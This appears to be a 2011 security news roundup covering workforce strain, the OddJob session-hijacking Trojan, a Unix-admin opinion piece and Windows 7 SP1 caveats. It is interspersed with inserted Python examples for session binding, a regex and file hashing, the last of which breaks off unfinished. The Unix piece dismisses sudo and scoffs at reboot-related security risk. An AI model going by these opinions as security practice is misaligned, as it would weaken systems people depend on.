Faced with an attack surface that seems to be growing at an overwhelming rate, many security professionals are beginning to wonder whether their jobs are too much for them, according to a study published last week.
Conducted by Frost & Sullivan, the 2011 (ISC)2 Global Information Security Workforce Study (GISWS) says new threats stemming from mobile devices, the cloud, social networking, and insecure applications have led to "information security professionals being stretched thin, and like a series of small leaks in a dam, the current overworked workforce may be showing signs of strain."
"In the modern organization, end users are dictating IT priorities by bringing technology to the enterprise rather than the other way around," said Robert Ayoub, global program director for network security at Frost & Sullivan. "Pressure to secure too much and the resulting skills gap are creating risk for organizations worldwide … They are being asked to do too much, with little time left to enhance their skills to meet the latest security threats and business demands."
As of 2010, Frost & Sullivan estimates that there are 2.28 million information security professionals worldwide. Demand for professionals is expected to increase to nearly 4.2 million by 2015, with a compound annual growth rate of 13.2 percent.
For as much as Mac OS X has a reputation for being safer than Windows, security researchers won’t hesitate to point out that the opposite is, in fact, true. Indeed, the primary reason why the Mac has been relatively immune from security threats often found on Windows is that the Mac’s relatively paltry market share makes it an unattractive target for malicious hackers. Put differently, when it comes to code quality as it pertains to security, the Mac is not the safe haven many assume it is.
But with Apple selling record numbers of Macs quarter after quarter, Apple’s PC market share is slowly but surely increasing. Moreover, as hackers become more sophisticated, malware is increasingly becoming OS independent. As a result, Apple needs to devote a lot more attention to system security, and recent moves over the past few months indicate that Apple is up for the challenge.
This past Thursday, Apple doled out a beta of OS X Lion to developers. In conjunction with that, Apple is also reaching out to noted security experts and offering them free previews of OS X 10.7 so that they can take a look at Apple’s new security measures and presumably reach back to Apple with any thoughts, observations, and concerns they might have.
Apple reportedly sent out the following letter to an undisclosed number of security researchers.
“I wanted to let you know that I’ve requested that you be invited to the prerelease seed of Mac OS X Lion, and you should receive an invitation soon,” the letter reads. “As you have reported Mac OS X security issues in the past, I thought that you might be interested in taking a look at this. It contains several improvements in the area of security countermeasures.”
“The frequency of cyber espionage in the banking sector of Georgia has increased, parallel to the increase in competition,” said Lasha Pataraia, Director of the Information Security Studies and Analysis Centre, an NGO working on analyzing cyber security issues in Georgia. Because of the low salaries in some of the banks, some employees do corporate espionage for their own private profit. The banks try not to divulge these facts, because it damages their reputation.
Based on an anonymous source, with whom The FINANCIAL spoke last week, KorStandard Bank is one of the victims targeted by cyber spies. Vaghtang Kuprashvili, head of the IT department of KSB denied the existence of corporate espionage at the Bank and said that the Bank is implementing all international standards for cyber security.
As Pataraia explained, corporate espionage is an issue for all banks that have a large client base and turnover. Modern technologies were adopted in the banking sector long ago, but the state sector is currently establishing new technologies of an automatic leading system. Most popular among big companies and state organizations is the ERP system, which makes massive automatisation possible and saves human resources.
“Due to the automatisation processes cyber espionage does not only exist in our country, but is at this time more active than ever. This is a companion and parallel process of technology development,” noted Lasha Pataraia.
Police officials are investigating a mysterious break-in at the five-star Lotte Hotel, an odd bit of cloak and dagger in Room 1961 whose storyline includes bumbling spies caught red-handed, negotiations for a supersonic jet fighter, a stolen laptop and a conveniently timed meeting with the president of South Korea.
Accounts from the police, local news media, government officials and hotel employees laid out a whodunit tale of the break-in, which took place last Wednesday when visiting Indonesian government and military officials left their rooms at the Lotte for a late-morning meeting with President Lee Myung-bak.
The Indonesians went to the Blue House, the presidential residence and offices, to discuss the purchase of military jets from the government-backed Korea Aerospace Industries. (The Korean plane, the T-50 Golden Eagle, is an advanced jet trainer that can be upgraded to a fighter-bomber. It is being considered for purchase by the Indonesians, who are also considering a subsonic Russian plane, the Yak-130.)
The Indonesians, traveling with their own security personnel, left their rooms unguarded, with their work computers and private documents inside, the police and Indonesian officials said later. The Indonesian group comprised as many as 50 people, reports said, including Defense Minister Purnomo Yusgiantoro.
Soon after the Indonesians left their rooms, two men and a woman went up to the 19th floor and entered Room 1961, the police said. Inside were two laptops.
A Texas man has admitted hacking into servers owned by an e-commerce company and making off with about $275,000. Jeremey Parker of Houston also copped to charges of breaking into servers maintained by NASA's Goddard Space Flight Center in Maryland and causing some $43,000 of damage.
The hacking spree spanned a 10-month stretch starting in December 2008 with the breach of systems owned by SWReg. A subsidiary of Digital River of Minnesota, the company manages royalties for independent software developers. “Parker hacked into SWReg's system, created the money by crediting the SWReg accounts, and then caused that money to be wire transferred to his bank account instead of the accounts of several developers,” a press release issued by the US Attorney's office in Minnesota said.
The NASA servers Parker hacked gave paying members of the scientific community access to oceanic data being sent to Earth from satellites. Eventually, the data was made available to everyone.
Source: http://www.infosecurity-magazine.com/view/16063/free-risk-analysismanagement-app-released-for-iphone-ipad-and-ipod-touch
Citicus, a corporate risk management and compliance specialist, has released a risk analysis/management app for the iOS range of Apple devices – the iPhone, iPad and iPod touch. The firm says that it hopes that the unique app – which is offered for free – will offer a simple way for decision-makers to identify the potential business impact of their organisation's assets and processes being disrupted. The app – Citicus MoCA – is billed as being easy to use and "enables a wider range of stakeholders to discover, assess and highlight the relative importance of their information resources, supplier relationships, products, sites and any other types of asset or process they depend on." In use, the app allows users to assess what is at stake in relation to a particular asset – e.g. a system, site or supply of goods or services – by identifying the maximum credible loss an organisation could suffer in a worst-case incident.
Geordy's comments: Tried this one out. It's a good idea and a good start but the model they use still produces a result along the lines of red, yellow & green light sort of analysis. To me, that's far too subjective. IMO, it would be far more useful if it quantified the risk in a dollar amount.
Online crime was up again in 2010, hitting its second-highest numbers of the past decade, according to a report issued by federal law enforcement authorities yesterday.
According to the "2010 Internet Crime Report," the Internet Crime Complaint Center (IC3) received 303,809 complaints of Internet crime in 2010, the second-most in its 10-year history.
IC3 is a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C). Since its creation in 2000, IC3 has received more than 2 million Internet crime complaints.
IC3 received and processed an average of 25,317 complaints per month in 2010, according to the report. Nondelivery of payment or merchandise accounted for the most complaints (14.4 percent). Scams using the FBI's name (13.2 percent) and incidents of identity theft (9.8 percent) rounded out the top three types of complaints.
In 2010, IC3 referred nearly half of all complaints (121,710) to law enforcement for further investigation, according to the report.
"We encourage individuals to report Internet crime through the IC3 Web portal," says Gordon Snow, assistant director of the FBI's Cyber Division. "The IC3 is a unique resource for federal, state, and local law enforcement to intake cases efficiently, find patterns in what otherwise appear to be isolated incidents, combine multiple smaller crime reports into larger, higher priority cases, and ultimately bring criminals to justice."
NW3C has developed a companion website for the 2010 report. The site features detailed information about Internet crime trends in all 50 states.
We've moved to the new host so hopefully everything is working correctly. We are adding back all the older episodes, so for those of you that are interested they should be available via web stream, direct download, iTunes and RSS feed.
Episode 331 – StreetView, Sony vs. MSFT, OddJob, 9 Traits, Reboot or Not?, Collective Defense & Real Risk
ISDPodcast Episode 331 for February 25, 2011. Tonight’s podcast is hosted by Rick Hayes, Keith Pachulski and Varun Sharma.
OWASP February Chapter Meeting:
When: February 28, 2011 6-8pm
Where: Tilted Kilt http://tinyurl.com/4oh2thj
My Hard Drive Died
Data Recovery Expert Certification
When: March 7-11, 2011
Where: Washington, DC
Data Recovery Expert Certification
When: June 6-10, 2011
Where: Atlanta, GA
When: March 18-19, 2011
Where: Atlanta, GA
CFP open now! http://bit.ly/dJoIM9
Unlock Indy Event
When: March 19, 2011 4pm – 8pm
Where: Indiana University-Purdue University Indianapolis, Informatics & Communications Technology Complex building 535 W. Michigan Street Indianapolis, IN
Cost: $30 or more donation to the Hoosier Veterans’ Assistance Foundation of Indiana (www.hvaf.org)
Information Security Leaders Survey: https://www.surveymonkey.com/s/isl-2011-certsurvey
Intro/Outro Music provided by JimmyZ (http://soundcloud.com/jimmyz)
Google has long-battled concerns that its Street View offering infringes on individual privacy, but the mapping service’s expansion into Israel is sparking concerns that terrorists could use the detailed information to carry out attacks, endangering the public and government officials. On Monday, a government team chaired by minister Dan Meridor heard testimony from experts who discussed the implications of privacy concerns and public security, tourism, and country image, according to a government release. After directing these experts to continue working to “protect vital public interests regarding this innovative project,” Israel’s government decided to continue cooperating with Google in order to operate the Street View service within the nation “as soon as possible,” the government said.
The country hopes Street View can help promote its tourism industry by showcasing attractions. “Street View could be very useful in public spaces, parks, museums, hotels, and places of historical, cultural, and religious interest. It could significantly help tourism. A Street View of the old city in particular could prove very popular,” Andre Oboler, director of the Community Internet Engagement Project at the Zionist Federation of Australia, wrote in a blog in the Jerusalem Post on Sunday.
Not all regions should appear, cautioned some government officials. In particular, Israel is concerned about photographing sensitive locations, such as areas near the homes of the president and prime minister, retired lieutenant colonel Mordechai Kedar told the Associated Press. “We already have problems with Google Earth, which exposes all kinds of facilities,” said Kedar, who spent 25 years with Israeli intelligence, noting that Street View could facilitate terrorist attacks within the nation. Like some counterparts in Europe and the United States, individual Israelis also may be concerned. Israel has privacy laws in place, and Google must comply, Yoram Hacohen, an attorney who heads the Israeli law, information, and technology authority at Israel’s Justice Ministry, told iBlogAuto.
“The law mandates that the public be informed by anyone collecting information for a database. If it wants to operate the service, it must advertise in newspapers that it plans to photograph particular areas. Anyone who doesn’t want to be photographed must approach Google ahead of time and ask not to be,” he said. “It’s clear that the public must be informed about these activities. If someone discovers himself on Street View and wants to have the image removed, there is a way to do this in the system. A person can erase himself. We will ask that the erasure and application processes be in Hebrew and not English.” To collect data for Street View, Google sends out specially equipped cars to film all streets and buildings. In the process, the autos sometimes capture individuals, and the cars’ equipment also has grabbed users’ unencrypted wireless network data. Currently, Google offers the three-dimensional tour service in 27 countries, including the United States, United Kingdom, Canada, Germany, and France.
Google does not have a specific launch date in mind for an Israeli service, according to published reports. The company on Monday declined to reveal which cities it would like to dispatch Street View vehicles to first, but it is said to be interested in Tel Aviv, Jerusalem, and possibly Haifa, said the Zionist Federation’s Oboler. “We aim to offer the benefits of street-level imagery to users all around the world, however, we have nothing specific to announce at this time,” Google told the AP.
Although the government debate may mark Google Street View’s first formal entry into Israel, the developer is not new to the country. In September 2010 it acquired Quiksee — also known as MentorWave Technologies — for an estimated $10 million, and in April 2010 it bought LabPixies for about $25 million. Quiksee develops 3D tour software that lets users add to a Google map, creating an image similar to that shown in Street View. For its part, LabPixies writes widgets for iGoogle, Android, and the iPhone.
Imagine you’re a gaming console manufacturer, and some kid hacks your console to do “neat tricks.” Do you help him or sue him? The question isn’t a hypothetical one; currently, two rival companies have each taken one of these roads. What remains to be seen is which approach will be more profitable, both financially and in terms of gamer goodwill. Microsoft is set to release a Kinect software developer kit (SDK) to academics and enthusiasts later this spring; the company really is welcoming hackers and curious minds to go to town on its hands-free gestural control interface. Who could have guessed that the Windows maker, which has struggled to shake an unjustly stodgy image, would be the first to invite experimental development on its gaming platform? Or that its biggest rival in the gaming space, Sony and the PlayStation 3, would be gathering some bad PR of its own for suing PS3 hackers at the same time?
Here’s the skinny: Sony is suing, among other entities, George Hotz, a.k.a. geohot, a 21-year-old hacker who is well known for his iPhone jailbreaking. In fact, Hotz created the first-ever public software exploit for jailbreaking the iPhone 3GS. After working on jailbreak software for the iPhone 4, iPad and a slew of other Apple devices, Hotz turned his attention to the PlayStation 3. Hotz hacked on the PS3 for at least seven months, successfully opening up the console for homebrew games and PS2 emulation. Along the way, he released the root key (also known as the metldr key), which decrypted the PS3’s loaders, allowing anyone who wanted to open up their own PS3s to do so.
Because of that, Hotz is now knee-deep in a bitter lawsuit with Sony, a lawsuit that’s cost him more than he can afford to pay. In fact, he had to beg the Internet for the more than $10,000 he needed to cover his legal bills. While Sony says Hotz violated copyrights and committed computer fraud, Hotz, who claims to have never played a pirated game in his life, retorts, “They don’t really care about piracy; they care about control.” In a stark contrast, Microsoft seems to not give two shakes about control, at least as far as hacking with the Kinect is concerned. The company’s brand new gestural control system is as hot as it is financially successful. While many corporations would keep a money-maker like that tightly locked down, Microsoft is doing everything it can to invite more hackers to play with and create experiments with the Kinect.
Microsoft’s big test came last November when a prominent Google engineer staged a Kinect-hacking contest. Previously, Microsoft had made statements that it wanted to make Kinect tamper-proof and would work with law enforcement to ensure that it remained so. But the company changed its tune last November, saying it was “excited to see that people are so inspired” by the possibilities inherent in the Kinect. Since then, hackers have used the Kinect for everything from World of Warcraft “magic” to music video production.
And today, given the success of Kinect hacking for Xbox, Microsoft announced it will release a non-commercial “Kinect for Windows” SDK. The company says the reason for “a starter kit for application developers is to make it easier for academic research and enthusiast communities to create even richer experiences using Kinect technology.”
The SDK is coming from Microsoft Research (MSR) in collaboration with the Interactive Entertainment Business (IEB), and it will give devs “deep Kinect system capabilities such as audio, system APIs, and direct control of the sensor.” A commercial version of the SDK will be available soon. The bigger picture Microsoft is trying to convey is that, as a company, Microsoft has long been excited about natural user interfaces; and it wants you, the hacker, to be excited about them, too. Granted, there are still likely some strings attached, and we doubt the company would be tickled to have you blog about Xbox jailbreak codes.
Nevertheless, suing users who hack your console versus helping users who hack (part of) your console are two interesting and opposed actions that are likely to be judged with great relish in the court of popular opinion. How should Sony be handling geohot and other PS3 hackers who just want to make the console do neat tricks? Is this lawsuit really doing anything other than garnering the multinational corporation a boatload of bad PR?
A new banking Trojan seizes browser session ID tokens to keep users logged into their accounts long after they think they’ve logged off. The malware sends data to remote servers in real time, enabling cybercriminals to stealthily hijack a browsing session and giving them plenty of time to funnel money out of accounts. OddJob is unlike the Zeus and SpyEye Trojans, which use a man-in-the-browser hacking technique to ride a session locally and manipulate HTML pages, Klein said. Instead, OddJob takes the session token from the victim’s computer, clones it and sends it in real time to a command and control server where a cybercriminal can remotely access the banking session.
The OddJob Trojan was designed to intercept a user’s banking communications through the browser. It can run on Internet Explorer and Mozilla Firefox. The malware can also be targeted directly at financial institutions, Klein said, injecting malicious code on vulnerable banking websites. In addition to session hijacking, the attackers added HTML injection and a few other features, which make it appear that they are gearing up for much broader attacks, Klein said. While OddJob is nowhere near the size and scope of Zeus or SpyEye, the attackers are manipulating the feature set and could gain a larger foothold, Klein said.
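The two things OddJob relies on, as described above, are that a cloned session token works from any machine and that the session stays alive after the victim thinks they have logged off. The following is an added example (not code from the original article or from any bank) of the server-side controls a defender would want: each token is bound to a hash of client attributes a cloned token cannot carry with it, concurrent use of one token from a different client revokes the session and raises an alert, logout really destroys the session on the server, and idle sessions expire. The client attributes, timeout value and sample clients are constructed for the example.

```python
import hashlib
import hmac
import secrets
import time

IDLE_TIMEOUT = 300  # seconds of inactivity before a session dies (hypothetical policy)

# Constructed sample clients; the addresses and user agents are not from the page.
VICTIM = {"ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"}
ATTACKER = {"ip": "198.51.100.77", "ua": "python-requests/2.0"}


def fingerprint(client):
    """Hash of attributes a stolen token does not carry: source IP and User-Agent."""
    raw = f"{client['ip']}|{client['ua']}".encode()
    return hashlib.sha256(raw).hexdigest()


class SessionStore:
    """Server-side session table; the token itself carries no state."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._sessions = {}      # token -> {"user", "fp", "last_seen"}
        self.alerts = []         # what a SOC would get forwarded

    def login(self, user, client):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[token] = {"user": user, "fp": fingerprint(client),
                                 "last_seen": self._now()}
        return token

    def validate(self, token, client):
        """Return 'ok', 'no_session', 'expired' or 'hijack_suspected'."""
        sess = self._sessions.get(token)
        if sess is None:
            return "no_session"
        now = self._now()
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]
            return "expired"
        if not hmac.compare_digest(sess["fp"], fingerprint(client)):
            # Same token, different client: a cloned token is in use. Kill the
            # session for everyone (the legitimate user must re-authenticate)
            # and record an alert with the offending source address.
            del self._sessions[token]
            self.alerts.append({"user": sess["user"], "ip": client["ip"],
                                "reason": "session token reused from another client"})
            return "hijack_suspected"
        sess["last_seen"] = now
        return "ok"

    def logout(self, token):
        """Destroy the session server-side; a kept copy of the token is now useless."""
        return self._sessions.pop(token, None) is not None


def demo():
    """Walk through the three controls with a fake clock; returns the observations."""
    clock = [1_000_000.0]
    store = SessionStore(now=lambda: clock[0])

    # 1. Token cloned to another machine: detected, session revoked, alert raised.
    token = store.login("alice", VICTIM)
    results = {"victim_first": store.validate(token, VICTIM),
               "attacker_reuse": store.validate(token, ATTACKER),
               "victim_after_revoke": store.validate(token, VICTIM),
               "alerts": len(store.alerts)}

    # 2. Logout really ends the session; the token no longer works anywhere.
    token = store.login("alice", VICTIM)
    results["logout"] = store.logout(token)
    results["attacker_after_logout"] = store.validate(token, ATTACKER)

    # 3. An abandoned session dies on its own even if the user never logs out.
    token = store.login("alice", VICTIM)
    clock[0] += IDLE_TIMEOUT + 1
    results["after_idle"] = store.validate(token, VICTIM)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Binding to the source IP is the strongest of these checks but also the most fragile: mobile users and corporate proxies change addresses mid-session, so a production deployment usually treats a fingerprint mismatch as a step-up authentication trigger rather than an outright revocation, and tunes the idle timeout per transaction type. The logout and expiry controls have no such trade-off and directly remove the window OddJob depends on.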
Veteran Unix admin trait No. 1: We don’t use sudo
Much like caps lock is cruise control for cool, sudo is a crutch for the timid. If we need to do something as root, we su to root, none of this sudo nonsense. In fact, for Unix-like operating systems that force sudo upon all users, the first thing we do is sudo su - and change the root password so that we can comfortably su - forever more. Using sudo exclusively is like bowling with only the inflatable bumpers in the gutters — it’s safer, but also causes you to not think through your actions fully.
Veteran Unix admin trait No. 2: We use vi, not emacs, and definitely not pico or nano
While we know that emacs is near and dear to the hearts of many Unix admins, it really is the Unix equivalent of Microsoft Word. Vi — and explicitly vim — is the true tool for veteran Unix geeks who need to get things done and not muck about with the extraneous nonsense that comes with emacs. Emacs has a built-in game of Tetris, for crying out loud.
Veteran Unix admin trait No. 3: We wield regular expressions like weapons
To the uninitiated, even the most innocuous regex looks like the result of a nauseous keyboard. To us, however, it’s pure poetry. The power represented in the complexity of PCRE (Perl Compatible Regular Expressions) cannot be matched by any other known tool. If you need to replace every third character in a 100,000-line file, except when it’s followed by the numeral 4, regular expressions aren’t just a tool for the job — they’re the only tool for the job. Those who shrink from learning regex do themselves and their colleagues a disservice on a daily basis. In just about every Unix shop of reasonable size, you’ll find one or two regex savants. These poor folks constantly get string snippets in their email accompanied by plaintive requests for a regex to parse them, usually followed by a promise of a round of drinks that never materializes.
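The "every third character, unless it is followed by a 4" task above is a good illustration of why a regex beats a hand-written loop: one pattern carries the counting, the exception and the replacement. The code below is an added example, not from the original article, written in Python's `re` module rather than Perl; the replacement character and the sample lines are constructed for the example, and it streams the input line by line so a 100,000-line file never has to fit in memory at once.

```python
import re
from typing import Iterable, Iterator

# Consume three characters per match so the "every third" count is kept by the
# engine itself. "." never matches a newline, so the count restarts on each
# line. The lookahead captures a following "4" (or nothing) without consuming
# it; the replacement callback uses that capture to decide whether to skip.
_TRIPLE = re.compile(r"(..)(.)(?=(4?))")


def mask_every_third(text: str, replacement: str = "_") -> str:
    """Replace every third character of each line unless the next character is '4'."""

    def _sub(match: re.Match) -> str:
        keep = match.group(3) == "4"            # the exception in the task statement
        third = match.group(2) if keep else replacement
        return match.group(1) + third

    return _TRIPLE.sub(_sub, text)


def mask_lines(lines: Iterable[str], replacement: str = "_") -> Iterator[str]:
    """Streaming variant for large files: yields each masked line in turn."""
    for line in lines:
        yield mask_every_third(line, replacement)


# Constructed sample input standing in for the 100,000-line file.
SAMPLE = ["abcdefg4hij\n", "abc4def\n", "ab\n"]


def demo() -> list:
    """Masks the constructed sample; returns the transformed lines."""
    return list(mask_lines(SAMPLE))


if __name__ == "__main__":
    for original, masked in zip(SAMPLE, demo()):
        print(f"{original.rstrip()!r:16} -> {masked.rstrip()!r}")
```

Note how the first sample line keeps counting after a skipped triple: "g4h" is still the third group, so its third character is masked even though a 4 sits inside it. That is exactly the behaviour a position-counting loop tends to get wrong, and the reason the regex version is easier to review than the loop it replaces.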
Veteran Unix admin trait No. 4: We’re inherently lazy
When given a problem that appears to involve lots of manual, repetitive work, we old-school Unix types will always opt to write code to take care of it. This usually takes less time than the manual option, but not always. Regardless, we’d rather spend those minutes and hours constructing an effort that can be referenced or used later, rather than simply fixing the immediate problem. Usually, this comes back to us in spades when a few years later we encounter a similar problem and can yank a few hundred lines of Perl from a file in our home directory, solve the problem in a matter of minutes, and go back to analyzing other code for possible streamlining. Or playing Angry Birds.
Veteran Unix admin trait No. 5: We prefer elegant solutions
If there are several ways to fix a problem or achieve a goal, we’ll opt to spend more time developing a solution that encompasses the actual problem and preventing future issues than simply whipping out a Band-Aid. This is related to the fact that we loathe revisiting a problem we’ve already marked “solved” in our minds. We figure that if we can eliminate future problems now by thinking a few steps ahead, we’ll have less to do down the road. We’re usually right.
Veteran Unix admin trait No. 6: We generally assume the problem is with whomever is asking the question
To reach a certain level of Unix enlightenment is to be extremely confident in your foundational knowledge. It also means we never think that a problem exists until we can see it for ourselves. Telling a veteran Unix admin that a file “vanished” will get you a snort of derision. Prove to him that it really happened and he’ll dive into the problem tirelessly until a suitable, sensible cause and solution are found. Many think that this is a sign of hubris or arrogance. It definitely is — but we’ve earned it.
Veteran Unix admin trait No. 7: We have more in common with medical examiners than doctors
When dealing with a massive problem, we’ll spend far more time in the postmortem than the actual problem resolution. Unless the workload allows us absolutely no time to investigate, we need to know the absolute cause of the problem. There is no magic in the work of a hard-core Unix admin; every situation must stem from a logical point and be traceable along the proper lines. In short, there’s a reason for everything, and we’ll leave no stone unturned until we find it.
To us, it’s easy to stop the bleeding by HUPping a process or changing permissions on a file or directory to 777, but that’s not the half of it. Why did the process need to be restarted? That shouldn’t have been necessary, and we need to know why.
Veteran Unix admin trait No. 8: We know more about Windows than we’ll ever let on
Though we may not run Windows on our personal machines or appear to care a whit about Windows servers, we’re generally quite capable at diagnosing and fixing Windows problems. This is because we’ve had to deal with these problems when they bleed over into our territory. However, we do not like to acknowledge this fact, because most times Windows doesn’t subscribe to the same deeply logical foundations as Unix, and that bothers us. See traits No. 5 and 6 above.
Veteran Unix admin trait No. 9: Rebooting is almost never an option
Unix boxes don’t need reboots. Unless there’s absolutely no other option, we’ll spend hours fixing a problem with a running system rather than give it a reboot. Our thinking here is that there’s no reason why a reboot should ever be necessary other than kernel or hardware changes, and a reboot is simply another temporary approach to fixing the problem. If the problem occurred once and was “fixed” by a reboot, it’ll happen again. We’d rather fix the problem than simply pull the plug and wait for the next time.
Server reboots should be rare — very rare. Kernel updates and hardware replacement are the two leading causes of reboots in the Unix world. Some have mentioned significant security risks in not rebooting servers, but that’s nonsense. If there’s a security risk present in a service or application, a patch can be applied without requiring a reboot. If the security risk is present in a kernel module, it’s generally possible to unload the module, apply a patch, and reload the module. Yes, you need to reboot if there’s a security risk in the kernel. Otherwise, there’s no real reason to reboot a Unix box. Some argued that other risks arise if you don’t reboot, such as the possibility certain critical services aren’t set to start at boot, which can cause problems. This is true, but it shouldn’t be an issue if you’re a good admin. Forgetting to set service startup parameters is a rookie mistake. Naturally, if you’re building the box and it’s not in production, you can do all the reboot tests you want without adverse effects. That’s just good practice.
But there’s another side: Those who consider reboots to be a worthy troubleshooting step are going to get themselves in trouble sooner rather than later. Let’s say a Unix box has gone wonky. A few services that were running will no longer start, maybe with a segfault, and other oddities abound.
If you shrug and reboot the box after looking around for a few minutes, you may have missed the fact that a junior admin inadvertently deleted /boot and some portions of /etc and /usr/lib64 due to a runaway script they were writing. That’s what was causing the segfaults and the wonky behavior. But since you rebooted the server without digging into the problem, you’ve made it much worse, and you’ll soon boot a rescue image — with all kinds of ponderous work awaiting you — while a production server is down. This is but one significant reason reboots in the Unix world should be extremely rare. Rather than a troubleshooting step, they’re a Hail Mary approach to server administration. In short, nobody ever fixed a problem caused by a full /var partition by rebooting the box.
In many cases, it’s extremely important not to reboot, because the key to fixing the problem is present on the system before the reboot, but will not be immediately available after. The problem will recur, and if the only known solution is to reboot, then the problem will never be fixed unless or until someone decides not to reboot and instead tries to find the root of the problem. Unfortunately, that’s not as common as it should be. Face it — a bad stick of RAM cares not a whit about system uptime or when the box was last booted. It’ll cause problems no matter what. The next time you’re looking at a problem and someone says, “Hey, let’s just reboot the thing,” make sure you’ve exhausted every other possibility before you send it to init 6. The time and pain you save will definitely be your own.
Echoing the comments of Microsoft security chief Scott Charney from his keynote calling for a “collective defense” of the Internet, this session’s panelists called for a combined government and private sector response to the threat. Mike McConnell, who was Director of National Intelligence under President George W. Bush, and director of the National Security Agency under President Clinton, said the way to approach the threat is to have the government determine the objective to address a certain cyber threat and let the private sector compete to determine how best to meet that objective. McConnell, now an executive vice president at the consulting firm Booz Allen Hamilton, cited the example of the volume of financial transactions between the two largest banks that are the lifeblood of the U.S. economy, moving $7 trillion to $8 trillion a day.
“To protect those transactions there should be a requirement for a higher level of protection to mitigate that risk,” he said, but that government should set the requirement and the private sector should compete to figure out how to meet it. Bruce Schneier, chief technology security officer of BT Managed Security Solutions and a frequent author and speaker — also frequently quoted — on computer security, agreed. “Regulate results, not technology,” Schneier said. “If you regulate technology, you stifle innovation. If you regulate results, you incent innovation.”
However, he said there’s a limit to how much private companies will spend to protect themselves from cyber attack. He argued that businesses will only spend to protect their networks up to the value of their companies, but that there may be damage to the public and the economy that is much greater than that. “The market won’t be able to solve that because the risk is greater than the company doing the work,” Schneier said.
Another solution to improving network security could be requiring companies to certify that they have taken the proper steps, said Michael Chertoff, former Secretary of Homeland Security under Bush and also a member of the 2010 RSA panel. Chertoff called for a regulatory framework where company executives and board members sign on the dotted line, certifying what steps they have taken to secure their network, what backup systems they have in place and what level of resiliency is built into their IT system. “People take that seriously. Is it dramatic? No, but it moves the ball down the field,” Chertoff said.
Schneier concurred, noting that holding individuals at a company accountable for certain protections has worked with environmental regulations and Sarbanes-Oxley, the post-Enron law that requires directors and executives to certify their financial results.
Given the strong response from some readers to my earlier post about a government “National ID” proposal in Charney’s keynote, it was nice to hear these panelists downplay the either-or argument — government or no government — and advocate a third way that asks, as Rodney King famously did, “Can’t we all just get along?”
Toward the end of 2010, Symantec surveyed more than 3,000 workers in North America and Europe about the risks they take with information in the workplace. The results paint a troubling picture that shows employees are ignoring risks posed by being careless with company data.
Employees tend to be risk takers with 46% taking risks “when appropriate” and 21% admitting that they “like to take risks.” While 60% of workers surveyed said they were more cautious with their online behavior at work than at home, this did not prevent 54% of them from removing information from company systems without permission.
They know they shouldn’t remove corporate data from the workplace, but they do it anyway because they seem to think either that company security policies hinder their jobs or that they can get away with it as long as they’re careful. In the simplest terms, employees believe it’s okay to do the wrong thing as long as it’s for the right reasons.
In fact, the reasons people gave for removing information from company systems without permission were mostly reasons that ENABLED them to do their jobs:
- 34% wanted to work from home
- 32% needed information for an off-site meeting
- 22% were trying to keep the information “safe”
Furthermore, these users are choosing to remove information by insecure means, which isn’t really surprising:
- 41% uploaded files to staging sites
- 38% emailed information to webmail accounts or third parties
- 28% wrote data to a USB stick, external hard drive or MP3 player
- 23% wrote them to CD or DVD
What does all of this mean for information protection? IT departments are often so focused on malicious threats from outsiders and rogue insiders that the risks posed by the everyday insider just doing his job are overlooked—a critical mistake. Clearly, workers are confused by the issue of information protection. Beyond deploying the right technologies to prevent data loss, it’s important that IT departments work with employees to explain why security policies matter, not just what they are.
- Whitelisting / blacklisting: Whitelisting software may not yet have checksums for all the files that the service pack modifies. The same goes for anti-virus: some anti-virus products monitor system files for changes and may raise an alert or block the installation of SP1.
- Firewalls: Third-party firewalls may find that some of the low-level hooks they use have changed.
- Disk encryption: In particular, full-disk encryption that modifies the boot process may find that some of its changes are undone by the SP install.
- Custom hardware: If you are using drivers other than those included in Windows 7 (or 2008 R2), be careful.
Specific examples. Consider them anecdotal, but if you run any of the software mentioned here, or similar software, this list should give you a guide to what to test.
- Users with old versions of Microsoft Security Essentials may not be able to install SP1. Upgrade first.
- Samsung Galaxy S phone drivers may have problems with SP1.
- Some users reported very long install times (more than an hour, which is not all that unusual for a service pack).
- Chrome 10 and 11 have issues, according to some tweets.
- Word 2003 VBA.
- Slower boot times with SP1 than without.
- Some reports of download issues due to overloaded servers.
- Lenovo’s ThinkVantage System Update may not work (update it before applying the SP).
- EVGA Precision Utility 2.0.2 (a graphics-card statistics program popular with gamers).
- Some BitLocker issues have been reported, but none confirmed at this point; they may also be due to entering the wrong password on reboot (the install reboots a couple of times in certain situations).
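The whitelisting and anti-virus caveat above comes down to one question: which files did the service pack actually change? The script below is an added example (not part of the original post and not any vendor's tooling) for a lab machine: snapshot the hashes of the directories you care about before the install, snapshot again afterwards, and diff the two. The result is the list you hand to the application-whitelisting or file-integrity product so its checksums are updated before the rollout. The `demo()` function uses a constructed temporary directory with made-up file names standing in for system binaries; nothing here touches a real Windows installation.

```python
"""File-hash baseline for pre-testing a service pack on a lab machine.
Added example, not part of the original post or of any vendor's tooling.
Run hash_tree() before the install and again after; diff_baseline() lists
what the SP changed, which is what an application whitelist or file-integrity
monitor needs updated before the rollout."""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map every file under root (path relative to root, '/' separators) to its SHA-256."""
    hashes = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 20), b""):
                    digest.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hashes[rel] = digest.hexdigest()
    return hashes


def diff_baseline(before, after):
    """Added, removed and modified paths between two hash_tree() snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def demo():
    """Constructed stand-in for a system directory; the file names are only
    labels, not real Windows binaries (assumption for the example)."""
    with tempfile.TemporaryDirectory() as root:
        sysdir = os.path.join(root, "System32")
        os.makedirs(sysdir)

        def put(name, content):
            with open(os.path.join(sysdir, name), "wb") as fh:
                fh.write(content)

        put("kernel.bin", b"build 7600")
        put("hal.bin", b"build 7600")
        put("legacy.bin", b"build 7600")
        before = hash_tree(root)          # snapshot taken before the SP

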